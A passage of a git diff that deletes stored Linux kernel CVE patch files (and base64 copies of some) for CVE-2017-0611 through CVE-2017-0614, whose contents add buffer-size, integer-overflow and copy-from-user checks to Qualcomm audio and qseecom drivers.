-  * it under the terms of the GNU General Public License version 2 and
-@@ -814,20 +814,25 @@ static int msm_pcm_playback_copy(struct snd_pcm_substream *substream, int a,
- 			if (prtd->mode == MODE_PCM) {
- 				ret = copy_from_user(&buf_node->frame.voc_pkt,
- 							buf, count);
-+				if (ret) {
-+					pr_err("%s: copy from user failed %d\n",
-+					       __func__, ret);
-+					return -EFAULT;
-+				}
- 				buf_node->frame.pktlen = count;
- 			} else {
- 				ret = copy_from_user(&buf_node->frame,
- 							buf, count);
-+				if (ret) {
-+					pr_err("%s: copy from user failed %d\n",
-+					       __func__, ret);
-+					return -EFAULT;
-+				}
- 				if (buf_node->frame.pktlen >= count)
- 					buf_node->frame.pktlen = count -
- 					(sizeof(buf_node->frame.frm_hdr) +
- 					 sizeof(buf_node->frame.pktlen));
- 			}
--			if (ret) {
--				pr_err("%s: copy from user failed %d\n",
--				       __func__, ret);
--				return -EFAULT;
--			}
- 			spin_lock_irqsave(&prtd->dsp_lock, dsp_flags);
- 			list_add_tail(&buf_node->list, &prtd->in_queue);
- 			spin_unlock_irqrestore(&prtd->dsp_lock, dsp_flags);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch
deleted file mode 100644
index 7d417aec..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From da638cc248f0d692a89e26f788c43d6f641c81ef Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 04 Nov 2016 14:35:58 +0800
-Subject: [PATCH] ASoC: soc: prevent risk of buffer overflow
-
-In case of large value for bufcnt_t or bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-CRs-Fixed: 1084210
-Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 31bd1d7..11a94e4 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -4054,7 +4054,7 @@
- 	struct asm_buffer_node *buffer_node = NULL;
- 	int	rc = 0;
- 	int    i = 0;
--	int	cmd_size = 0;
-+	uint32_t cmd_size = 0;
- 	uint32_t bufcnt_t;
- 	uint32_t bufsz_t;
- 
-@@ -4076,10 +4076,25 @@
- 		bufsz_t = PAGE_ALIGN(bufsz_t);
- 	}
- 
-+	if (bufcnt_t > (UINT_MAX
-+			- sizeof(struct avs_cmd_shared_mem_map_regions))
-+			/ sizeof(struct avs_shared_map_region_payload)) {
-+		pr_err("%s: Unsigned Integer Overflow. bufcnt_t = %u\n",
-+				__func__, bufcnt_t);
-+		return -EINVAL;
-+	}
-+
- 	cmd_size = sizeof(struct avs_cmd_shared_mem_map_regions)
- 			+ (sizeof(struct avs_shared_map_region_payload)
- 							* bufcnt_t);
- 
-+
-+	if (bufcnt > (UINT_MAX / sizeof(struct asm_buffer_node))) {
-+		pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+				__func__, bufcnt);
-+		return -EINVAL;
-+	}
-+
- 	buffer_node = kzalloc(sizeof(struct asm_buffer_node) * bufcnt,
- 				GFP_KERNEL);
- 	if (!buffer_node) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64
deleted file mode 100644
index 054ba4fd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBkYTYzOGNjMjQ4ZjBkNjkyYTg5ZTI2Zjc4OGM0M2Q2ZjY0MWM4MWVmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDA0IE5vdiAyMDE2IDE0OjM1OjU4ICswODAwClN1YmplY3Q6IFtQQVRDSF0gQVNvQzogc29jOiBwcmV2ZW50IHJpc2sgb2YgYnVmZmVyIG92ZXJmbG93CgpJbiBjYXNlIG9mIGxhcmdlIHZhbHVlIGZvciBidWZjbnRfdCBvciBidWZjbnQsCmNtZF9zaXplIG1heSBvdmVyZmxvdy4gQnVmZmVyIHNpemUgYWxsb2NhdGVkIGJ5IGNtZF9zaXplIG1pZ2h0CmJlIG5vdCBhcyBleHBlY3RlZC4KUG9zc2libGUgYnVmZmVyIG92ZXJmbG93IGNvdWxkIGhhcHBlbi4KCkNScy1GaXhlZDogMTA4NDIxMApDaGFuZ2UtSWQ6IEk5NTU2ZjE4ZGQ2YTlmZGYzZjc2YzEzM2FlNzVjMDRlY2NlMTcxZjA4ClNpZ25lZC1vZmYtYnk6IFhpYW9qdW4gU2FuZyA8eHNhbmdAY29kZWF1cm9yYS5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9xNmFzbS5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKaW5kZXggMzFiZDFkNy4uMTFhOTRlNCAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKQEAgLTQwNTQsNyArNDA1NCw3IEBACiAJc3RydWN0IGFzbV9idWZmZXJfbm9kZSAqYnVmZmVyX25vZGUgPSBOVUxMOwogCWludAlyYyA9IDA7CiAJaW50ICAgIGkgPSAwOwotCWludAljbWRfc2l6ZSA9IDA7CisJdWludDMyX3QgY21kX3NpemUgPSAwOwogCXVpbnQzMl90IGJ1ZmNudF90OwogCXVpbnQzMl90IGJ1ZnN6X3Q7CiAKQEAgLTQwNzYsMTAgKzQwNzYsMjUgQEAKIAkJYnVmc3pfdCA9IFBBR0VfQUxJR04oYnVmc3pfdCk7CiAJfQogCisJaWYgKGJ1ZmNudF90ID4gKFVJTlRfTUFYCisJCQktIHNpemVvZihzdHJ1Y3QgYXZzX2NtZF9zaGFyZWRfbWVtX21hcF9yZWdpb25zKSkKKwkJCS8gc2l6ZW9mKHN0cnVjdCBhdnNfc2hhcmVkX21hcF9yZWdpb25fcGF5bG9hZCkpIHsKKwkJcHJfZXJyKCIlczogVW5zaWduZWQgSW50ZWdlciBPdmVyZmxvdy4gYnVmY250X3QgPSAldVxuIiwKKwkJCQlfX2Z1bmNfXywgYnVmY250X3QpOworCQlyZXR1cm4gLUVJTlZBTDsKKwl9CisKIAljbWRfc2l6ZSA9IHNpemVvZihzdHJ1Y3QgYXZzX2NtZF9zaGFyZWRfbWVtX21hcF9yZWdpb25zKQogCQkJKyAoc2l6ZW9mKHN0cnVjdCBhdnNfc2hhcmVkX21hcF9yZWdpb25fcGF5bG9hZCkKIAkJCQkJCQkqIGJ1ZmNudF90KTsKIAorCisJaWYgKGJ1ZmNudCA+IChVSU5UX01BWCAvIHNpemVvZihzdHJ1Y3QgYXNtX2J1ZmZlcl9ub2RlKSkpIHsKKwkJcHJfZXJyKCIlczogVW5zaWduZWQgSW50ZWdlciBPdmVyZmxvdy4gYnVmY250ID0gJXVcbiIsCisJCQkJX19mdW5jX18sIGJ1ZmNudCk7CisJCXJldHVybiAtRUlOVkFMOworCX0KKwogCWJ1ZmZlcl9ub2RlID0ga3phbGxvYyhzaXplb2Yoc3RydWN0IGFzbV9idWZmZXJfbm9kZSkgKiBidWZjbnQsCiAJCQkJR0ZQX0tFUk5FTCk7CiAJaWYgKCFidWZmZXJfbm9kZSkgewo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch
deleted file mode 100644
index 83c190e0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 077614c9f2b9f9d062fed66e3ae7669937ea6b85 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 04 Nov 2016 14:35:58 +0800
-Subject: [PATCH] ASoC: soc: qdsp6: prevent risk of buffer overflow
-
-In case of large value for bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-Backport reference:
- * Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
- * CRs-Fixed: 1084210
-
-Change-Id: I93f820e0344bfa05dee6a3e83d84ef688e23f761
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
-Signed-off-by: Adrian DC <radian.dc@gmail.com>
----
-
-diff --git a/sound/soc/msm/qdsp6/q6asm.c b/sound/soc/msm/qdsp6/q6asm.c
-index 2cde92a..c3bcdcd 100644
---- a/sound/soc/msm/qdsp6/q6asm.c
-+++ b/sound/soc/msm/qdsp6/q6asm.c
-@@ -2893,7 +2893,7 @@
- 	void	*payload = NULL;
- 	int	rc = 0;
- 	int	i = 0;
--	int	cmd_size = 0;
-+	uint32_t cmd_size = 0;
- 
- 	if (!ac || ac->apr == NULL || this_mmap.apr == NULL) {
- 		pr_err("APR handle NULL\n");
-@@ -2901,6 +2901,14 @@
- 	}
- 	pr_debug("%s: Session[%d]\n", __func__, ac->session);
- 
-+	if (bufcnt > (UINT_MAX
-+			- sizeof(struct asm_stream_cmd_memory_map_regions))
-+			/ sizeof(struct asm_memory_map_regions)) {
-+		pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+				__func__, bufcnt);
-+		return -EINVAL;
-+	}
-+
- 	cmd_size = sizeof(struct asm_stream_cmd_memory_map_regions)
- 			+ sizeof(struct asm_memory_map_regions) * bufcnt;
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64
deleted file mode 100644
index 79fda34b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAwNzc2MTRjOWYyYjlmOWQwNjJmZWQ2NmUzYWU3NjY5OTM3ZWE2Yjg1IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDA0IE5vdiAyMDE2IDE0OjM1OjU4ICswODAwClN1YmplY3Q6IFtQQVRDSF0gQVNvQzogc29jOiBxZHNwNjogcHJldmVudCByaXNrIG9mIGJ1ZmZlciBvdmVyZmxvdwoKSW4gY2FzZSBvZiBsYXJnZSB2YWx1ZSBmb3IgYnVmY250LApjbWRfc2l6ZSBtYXkgb3ZlcmZsb3cuIEJ1ZmZlciBzaXplIGFsbG9jYXRlZCBieSBjbWRfc2l6ZSBtaWdodApiZSBub3QgYXMgZXhwZWN0ZWQuClBvc3NpYmxlIGJ1ZmZlciBvdmVyZmxvdyBjb3VsZCBoYXBwZW4uCgpCYWNrcG9ydCByZWZlcmVuY2U6CiAqIENoYW5nZS1JZDogSTk1NTZmMThkZDZhOWZkZjNmNzZjMTMzYWU3NWMwNGVjY2UxNzFmMDgKICogQ1JzLUZpeGVkOiAxMDg0MjEwCgpDaGFuZ2UtSWQ6IEk5M2Y4MjBlMDM0NGJmYTA1ZGVlNmEzZTgzZDg0ZWY2ODhlMjNmNzYxClNpZ25lZC1vZmYtYnk6IFhpYW9qdW4gU2FuZyA8eHNhbmdAY29kZWF1cm9yYS5vcmc+ClNpZ25lZC1vZmYtYnk6IEFkcmlhbiBEQyA8cmFkaWFuLmRjQGdtYWlsLmNvbT4KLS0tCgpkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9xZHNwNi9xNmFzbS5jIGIvc291bmQvc29jL21zbS9xZHNwNi9xNmFzbS5jCmluZGV4IDJjZGU5MmEuLmMzYmNkY2QgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vcWRzcDYvcTZhc20uYworKysgYi9zb3VuZC9zb2MvbXNtL3Fkc3A2L3E2YXNtLmMKQEAgLTI4OTMsNyArMjg5Myw3IEBACiAJdm9pZAkqcGF5bG9hZCA9IE5VTEw7CiAJaW50CXJjID0gMDsKIAlpbnQJaSA9IDA7Ci0JaW50CWNtZF9zaXplID0gMDsKKwl1aW50MzJfdCBjbWRfc2l6ZSA9IDA7CiAKIAlpZiAoIWFjIHx8IGFjLT5hcHIgPT0gTlVMTCB8fCB0aGlzX21tYXAuYXByID09IE5VTEwpIHsKIAkJcHJfZXJyKCJBUFIgaGFuZGxlIE5VTExcbiIpOwpAQCAtMjkwMSw2ICsyOTAxLDE0IEBACiAJfQogCXByX2RlYnVnKCIlczogU2Vzc2lvblslZF1cbiIsIF9fZnVuY19fLCBhYy0+c2Vzc2lvbik7CiAKKwlpZiAoYnVmY250ID4gKFVJTlRfTUFYCisJCQktIHNpemVvZihzdHJ1Y3QgYXNtX3N0cmVhbV9jbWRfbWVtb3J5X21hcF9yZWdpb25zKSkKKwkJCS8gc2l6ZW9mKHN0cnVjdCBhc21fbWVtb3J5X21hcF9yZWdpb25zKSkgeworCQlwcl9lcnIoIiVzOiBVbnNpZ25lZCBJbnRlZ2VyIE92ZXJmbG93LiBidWZjbnQgPSAldVxuIiwKKwkJCQlfX2Z1bmNfXywgYnVmY250KTsKKwkJcmV0dXJuIC1FSU5WQUw7CisJfQorCiAJY21kX3NpemUgPSBzaXplb2Yoc3RydWN0IGFzbV9zdHJlYW1fY21kX21lbW9yeV9tYXBfcmVnaW9ucykKIAkJCSsgc2l6ZW9mKHN0cnVjdCBhc21fbWVtb3J5X21hcF9yZWdpb25zKSAqIGJ1ZmNudDsKIAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch
deleted file mode 100644
index 8b91f89a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 1aa5df9246557a98181f03e98530ffd509b954c8 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 4 Nov 2016 14:35:58 +0800
-Subject: ASoC: soc: prevent risk of buffer overflow
-
-In case of large value for bufcnt_t or bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-CRs-Fixed: 1084210
-Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/q6asm.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0ea94cb..fe34f92f 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -5846,7 +5846,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- 	struct asm_buffer_node *buffer_node = NULL;
- 	int	rc = 0;
- 	int    i = 0;
--	int	cmd_size = 0;
-+	uint32_t cmd_size = 0;
- 	uint32_t bufcnt_t;
- 	uint32_t bufsz_t;
- 
-@@ -5868,10 +5868,25 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- 		bufsz_t = PAGE_ALIGN(bufsz_t);
- 	}
- 
-+	if (bufcnt_t > (UINT_MAX
-+			- sizeof(struct avs_cmd_shared_mem_map_regions))
-+			/ sizeof(struct avs_shared_map_region_payload)) {
-+		pr_err("%s: Unsigned Integer Overflow. bufcnt_t = %u\n",
-+				__func__, bufcnt_t);
-+		return -EINVAL;
-+	}
-+
- 	cmd_size = sizeof(struct avs_cmd_shared_mem_map_regions)
- 			+ (sizeof(struct avs_shared_map_region_payload)
- 							* bufcnt_t);
- 
-+
-+	if (bufcnt > (UINT_MAX / sizeof(struct asm_buffer_node))) {
-+		pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+				__func__, bufcnt);
-+		return -EINVAL;
-+	}
-+
- 	buffer_node = kzalloc(sizeof(struct asm_buffer_node) * bufcnt,
- 				GFP_KERNEL);
- 	if (!buffer_node) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch
deleted file mode 100644
index 208568f4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 05efafc998dc86c3b75af9803ca71255ddd7a8eb Mon Sep 17 00:00:00 2001
-From: Brahmaji K <bkomma@codeaurora.org>
-Date: Tue, 13 Dec 2016 20:32:24 +0530
-Subject: msm-3.18: drivers : added validation of input/output buffer sizes
-
-This change fixes issues reagrding the ioctl
-QSEECOM_IOCTL_MDTP_CIPHER_DIP_REQ uncovered by fuzzy tests.
-Modified handler of above ioctl, not to allow input/output
-buffer sizes greater than a fixed defined size.
-
-Change-Id: I69f94a29d939341564f6f3ebfda48fceaa934542
-Signed-off-by: Brahmaji K <bkomma@codeaurora.org>
----
- drivers/misc/qseecom.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index baea36b..34b70fd 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -80,6 +80,9 @@
- /* Encrypt/Decrypt Data Integrity Partition (DIP) for MDTP */
- #define SCM_MDTP_CIPHER_DIP		0x01
- 
-+/* Maximum Allowed Size (128K) of Data Integrity Partition (DIP) for MDTP */
-+#define MAX_DIP			0x20000
-+
- #define RPMB_SERVICE			0x2000
- #define SSD_SERVICE			0x3000
- 
-@@ -6029,7 +6032,8 @@ static int qseecom_mdtp_cipher_dip(void __user *argp)
- 		}
- 
- 		if (req.in_buf == NULL || req.out_buf == NULL ||
--			req.in_buf_size == 0 || req.out_buf_size == 0 ||
-+			req.in_buf_size == 0 || req.in_buf_size > MAX_DIP ||
-+			req.out_buf_size == 0 || req.out_buf_size > MAX_DIP ||
- 				req.direction > 1) {
- 				pr_err("invalid parameters\n");
- 				ret = -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch
deleted file mode 100644
index 2ceef3d9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch
+++ /dev/null
@@ -1,217 +0,0 @@
-From b108c651cae9913da1ab163cb4e5f7f2db87b747 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Wed, 11 Jan 2017 12:12:31 -0800
-Subject: qseecom: improve input validatation for qseecom_send_service_cmd
-
-Make change to improve input validation on request and response
-buffers' address and length for qseecom_send_service_cmd.
-
-Change-Id: I047e3264333d767541e43b7dadd1727232fd48ef
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 152 ++++++++++++++++++++++++++++---------------------
- 1 file changed, 88 insertions(+), 64 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 20949487..5e37cd6 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1,6 +1,6 @@
- /*Qualcomm Secure Execution Environment Communicator (QSEECOM) driver
-  *
-- * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2634,11 +2634,6 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 		return -EINVAL;
- 	}
- 
--	if ((!req_ptr->cmd_req_buf) || (!req_ptr->resp_buf)) {
--		pr_err("Invalid req/resp buffer, exiting\n");
--		return -EINVAL;
--	}
--
- 	/* Clients need to ensure req_buf is at base offset of shared buffer */
- 	if ((uintptr_t)req_ptr->cmd_req_buf !=
- 			data_ptr->client.user_virt_sb_base) {
-@@ -2646,15 +2641,11 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 		return -EINVAL;
- 	}
- 
--	if (((uintptr_t)req_ptr->resp_buf <
--			data_ptr->client.user_virt_sb_base) ||
--		((uintptr_t)req_ptr->resp_buf >=
--			(data_ptr->client.user_virt_sb_base +
--			data_ptr->client.sb_length))){
--		pr_err("response buffer address not within shared bufffer\n");
-+	if (data_ptr->client.sb_length <
-+			sizeof(struct qseecom_rpmb_provision_key)) {
-+		pr_err("shared buffer is too small to hold key type\n");
- 		return -EINVAL;
- 	}
--
- 	req_buf = data_ptr->client.sb_virt;
- 
- 	send_svc_ireq_ptr->qsee_cmd_id = req_ptr->cmd_id;
-@@ -2681,36 +2672,6 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 		return -EINVAL;
- 	}
- 
--	if (((uintptr_t)req_ptr->cmd_req_buf <
--			data_ptr->client.user_virt_sb_base) ||
--		((uintptr_t)req_ptr->cmd_req_buf >=
--			(data_ptr->client.user_virt_sb_base +
--			data_ptr->client.sb_length))) {
--		pr_err("cmd buffer address not within shared bufffer\n");
--		return -EINVAL;
--	}
--
--	if (((uintptr_t)req_ptr->resp_buf <
--			data_ptr->client.user_virt_sb_base) ||
--		((uintptr_t)req_ptr->resp_buf >=
--			(data_ptr->client.user_virt_sb_base +
--			data_ptr->client.sb_length))){
--		pr_err("response buffer address not within shared bufffer\n");
--		return -EINVAL;
--	}
--
--	if ((req_ptr->cmd_req_len == 0) || (req_ptr->resp_len == 0) ||
--		req_ptr->cmd_req_len > data_ptr->client.sb_length ||
--		req_ptr->resp_len > data_ptr->client.sb_length) {
--		pr_err("cmd buffer length or response buffer length not valid\n");
--		return -EINVAL;
--	}
--
--	if (req_ptr->cmd_req_len > UINT_MAX - req_ptr->resp_len) {
--		pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
--		return -EINVAL;
--	}
--
- 	reqd_len_sb_in = req_ptr->cmd_req_len + req_ptr->resp_len;
- 	if (reqd_len_sb_in > data_ptr->client.sb_length) {
- 		pr_err("Not enough memory to fit cmd_buf and resp_buf. ");
-@@ -2732,28 +2693,11 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 	return ret;
- }
- 
--static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
--				void __user *argp)
-+static int __validate_send_service_cmd_inputs(struct qseecom_dev_handle *data,
-+				struct qseecom_send_svc_cmd_req *req)
- {
--	int ret = 0;
--	struct qseecom_client_send_service_ireq send_svc_ireq;
--	struct qseecom_client_send_fsm_key_req send_fsm_key_svc_ireq;
--	struct qseecom_command_scm_resp resp;
--	struct qseecom_send_svc_cmd_req req;
--	void   *send_req_ptr;
--	size_t req_buf_size;
--
--	/*struct qseecom_command_scm_resp resp;*/
--
--	if (copy_from_user(&req,
--				(void __user *)argp,
--				sizeof(req))) {
--		pr_err("copy_from_user failed\n");
--		return -EFAULT;
--	}
--
--	if ((req.resp_buf == NULL) || (req.cmd_req_buf == NULL)) {
--		pr_err("cmd buffer or response buffer is null\n");
-+	if (!req || !req->resp_buf || !req->cmd_req_buf) {
-+		pr_err("req or cmd buffer or response buffer is null\n");
- 		return -EINVAL;
- 	}
- 
-@@ -2777,6 +2721,86 @@ static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
- 		return -EINVAL;
- 	}
- 
-+	if (((uintptr_t)req->cmd_req_buf <
-+				data->client.user_virt_sb_base) ||
-+		((uintptr_t)req->cmd_req_buf >=
-+		(data->client.user_virt_sb_base + data->client.sb_length))) {
-+		pr_err("cmd buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+	if (((uintptr_t)req->resp_buf <
-+				data->client.user_virt_sb_base)  ||
-+		((uintptr_t)req->resp_buf >=
-+		(data->client.user_virt_sb_base + data->client.sb_length))) {
-+		pr_err("response buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+	if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
-+		(req->cmd_req_len > data->client.sb_length) ||
-+		(req->resp_len > data->client.sb_length)) {
-+		pr_err("cmd buf length or response buf length not valid\n");
-+		return -EINVAL;
-+	}
-+	if (req->cmd_req_len > UINT_MAX - req->resp_len) {
-+		pr_err("Integer overflow detected in req_len & rsp_len\n");
-+		return -EINVAL;
-+	}
-+
-+	if ((req->cmd_req_len + req->resp_len) > data->client.sb_length) {
-+		pr_debug("Not enough memory to fit cmd_buf.\n");
-+		pr_debug("resp_buf. Required: %u, Available: %zu\n",
-+				(req->cmd_req_len + req->resp_len),
-+					data->client.sb_length);
-+		return -ENOMEM;
-+	}
-+	if ((uintptr_t)req->cmd_req_buf > (ULONG_MAX - req->cmd_req_len)) {
-+		pr_err("Integer overflow in req_len & cmd_req_buf\n");
-+		return -EINVAL;
-+	}
-+	if ((uintptr_t)req->resp_buf > (ULONG_MAX - req->resp_len)) {
-+		pr_err("Integer overflow in resp_len & resp_buf\n");
-+		return -EINVAL;
-+	}
-+	if (data->client.user_virt_sb_base >
-+					(ULONG_MAX - data->client.sb_length)) {
-+		pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+		return -EINVAL;
-+	}
-+	if ((((uintptr_t)req->cmd_req_buf + req->cmd_req_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+					data->client.sb_length)) ||
-+		(((uintptr_t)req->resp_buf + req->resp_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+					data->client.sb_length))) {
-+		pr_err("cmd buf or resp buf is out of shared buffer region\n");
-+		return -EINVAL;
-+	}
-+	return 0;
-+}
-+
-+static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
-+				void __user *argp)
-+{
-+	int ret = 0;
-+	struct qseecom_client_send_service_ireq send_svc_ireq;
-+	struct qseecom_client_send_fsm_key_req send_fsm_key_svc_ireq;
-+	struct qseecom_command_scm_resp resp;
-+	struct qseecom_send_svc_cmd_req req;
-+	void   *send_req_ptr;
-+	size_t req_buf_size;
-+
-+	/*struct qseecom_command_scm_resp resp;*/
-+
-+	if (copy_from_user(&req,
-+				(void __user *)argp,
-+				sizeof(req))) {
-+		pr_err("copy_from_user failed\n");
-+		return -EFAULT;
-+	}
-+
-+	if (__validate_send_service_cmd_inputs(data, &req))
-+		return -EINVAL;
-+
- 	data->type = QSEECOM_SECURE_SERVICE;
- 
- 	switch (req.cmd_id) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch
deleted file mode 100644
index d301f854..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From fc2ae27eb9721a0ce050c2062734fec545cda604 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Thu, 20 Oct 2016 17:34:20 -0700
-Subject: qseecom: check buffer size when loading firmware images
-
-Make change in __qseecom_load_fw() and qseecom_load_commonlib_image()
-to check buffer size before copying img to buffer.
-
-CRs-fixed: 1080290
-Change-Id: I0f48666ac948a9571e249598ae7cc19df9036b1d
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 32 +++++++++++++++++++++++++++-----
- 1 file changed, 27 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 061bc99..dc20841 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -3590,7 +3590,7 @@ static bool __qseecom_is_fw_image_valid(const struct firmware *fw_entry)
- 	return true;
- }
- 
--static int __qseecom_get_fw_size(char *appname, uint32_t *fw_size,
-+static int __qseecom_get_fw_size(const char *appname, uint32_t *fw_size,
- 					uint32_t *app_arch)
- {
- 	int ret = -1;
-@@ -3628,14 +3628,21 @@ static int __qseecom_get_fw_size(char *appname, uint32_t *fw_size,
- 	}
- 	pr_debug("QSEE %s app, arch %u\n", appname, *app_arch);
- 	release_firmware(fw_entry);
-+	fw_entry = NULL;
- 	for (i = 0; i < num_images; i++) {
- 		memset(fw_name, 0, sizeof(fw_name));
- 		snprintf(fw_name, ARRAY_SIZE(fw_name), "%s.b%02d", appname, i);
- 		ret = request_firmware(&fw_entry, fw_name, qseecom.pdev);
- 		if (ret)
- 			goto err;
-+		if (*fw_size > U32_MAX - fw_entry->size) {
-+			pr_err("QSEE %s app file size overflow\n", appname);
-+			ret = -EINVAL;
-+			goto err;
-+		}
- 		*fw_size += fw_entry->size;
- 		release_firmware(fw_entry);
-+		fw_entry = NULL;
- 	}
- 
- 	return ret;
-@@ -3646,8 +3653,9 @@ err:
- 	return ret;
- }
- 
--static int __qseecom_get_fw_data(char *appname, u8 *img_data,
--					struct qseecom_load_app_ireq *load_req)
-+static int __qseecom_get_fw_data(const char *appname, u8 *img_data,
-+				uint32_t fw_size,
-+				struct qseecom_load_app_ireq *load_req)
- {
